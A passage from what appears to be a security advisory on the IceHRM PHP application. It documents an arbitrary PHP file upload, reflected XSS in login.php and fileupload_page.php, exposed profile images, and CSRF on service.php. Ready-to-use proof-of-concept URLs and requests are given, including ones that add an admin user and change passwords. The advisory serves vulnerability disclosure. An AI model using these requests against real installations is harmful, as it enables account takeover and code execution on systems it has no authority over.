1. http://zsltest/icehrm/app/fileupload_page.php?id=xxx.php&msg=Upload%20Attachment&file_group=EmployeeDocument&file_type=all&user=1
2. xxx.txt contents:
<?php phpinfo(); ?>
3. Upload the filename
4. Access the file:
Severity: CRITICAL
#####################################################
4. Cross-Site Scripting (XSS)
#####################################################
File:
login.php
Vulnerable code:
---- snip ----
<script type="text/javascript">
var key = "";
<?php if(isset($_REQUEST['key'])){?>
key = '<?=$_REQUEST['key']?>';
key = key.replace(/ /g,"+");
<?php }?>
---- snip ----
Proof of Concept (PoC):
http://zsltest/icehrm/app/login.php?key=';</script><script>alert(‘zsl’);</script>
Severity: MEDIUM
#####################################################
5. Cross-Site Scripting (XSS)
#####################################################
File:
fileupload_page.php
Vulnerable code:
---- snip ----
<div id="upload_form">
<form id="upload_data" method="post" action="<?=CLIENT_BASE_URL?>fileupload.php" enctype="multipart/form-data">
<input id="file_name" name="file_name" type="hidden" value="<?=$_REQUEST['id']?>"/>
<input id="file_group" name="file_group" type="hidden" value="<?=$_REQUEST['file_group']?>"/>
<input id="user" name="user" type="hidden" value="<?=$_REQUEST['user']?>"/>
<label id="upload_status"><?=$_REQUEST['msg']?></label><input id="file" name="file" type="file" onChange="if(checkFileType('file','<?=$fileTypes?>')){uploadfile();}"></input>
…
---- snip ----
Vulnerable parameters: id, file_group, user, msg
Proof of Concept (PoC):
http://zsltest/icehrm/fileupload_page.php?id=XXXX%22%3E%3Cscript%3Ealert(‘zsl’)%3C/script%3E
Severity: MEDIUM
#####################################################
6. Information Disclosure / Leaking Sensitive User Info
#####################################################
Users’/employees’ profile images are easily accessible in the ‘data’ folder.
Proof of Concept (PoC):
http://192.168.200.119/icehrm/app/data/profile_image_1.jpg
http://192.168.200.119/icehrm/app/data/profile_image_X.jpg <- x=user id
Severity: LOW
#####################################################
7. Cross-Site Request Forgery (CSRF)
#####################################################
All forms are vulnerable to CSRF.
Documents library:
http://localhost/icehrm/app/service.php
POST
document=2&valid_until=&status=Inactive&details=detailz&attachment=attachment_evi4t3VuKqDfyY&a=add&t=EmployeeDocument
Personal info:
http://localhost/icehrm/app/service.php
GET
t=Employee
a=ca
sa=get
mod=modules=employees
req={"map":"{\"nationality\":[\"Nationality\",\"id\",\"name\"],\"employment_status\":[\"EmploymentStatus\",\"id\",\"name\"],\"job_title\":[\"JobTitle\",\"id\",\"name\"],\"pay_grade\":[\"PayGrade\",\"id\",\"name\"],\"country\":[\"Country\",\"code\",\"name\"],\"province\":[\"Province\",\"id\",\"name\"],\"department\":[\"CompanyStructure\",\"id\",\"title\"],\"supervisor\":[\"Employee\",\"id\",\"first_name+last_name\"]}"}
Add new admin user:
http://localhost/icehrm/app/service.php
POST
username=test5&email=test5%40zeroscience.mk&employee=1&user_level=Admin&a=add&t=User
Change password of user:
http://localhost/icehrm/app/service.php?
GET
t=User
a=ca
sa=changePassword
mod=admin=users
req={"id":5,"pwd":"newpass"}
Add/edit modules:
http://localhost/icehrm/app/service.php
POST
t=Module&a=get&sm=%7B%7D&ft=&ob=
Severity: LOW
#####################################################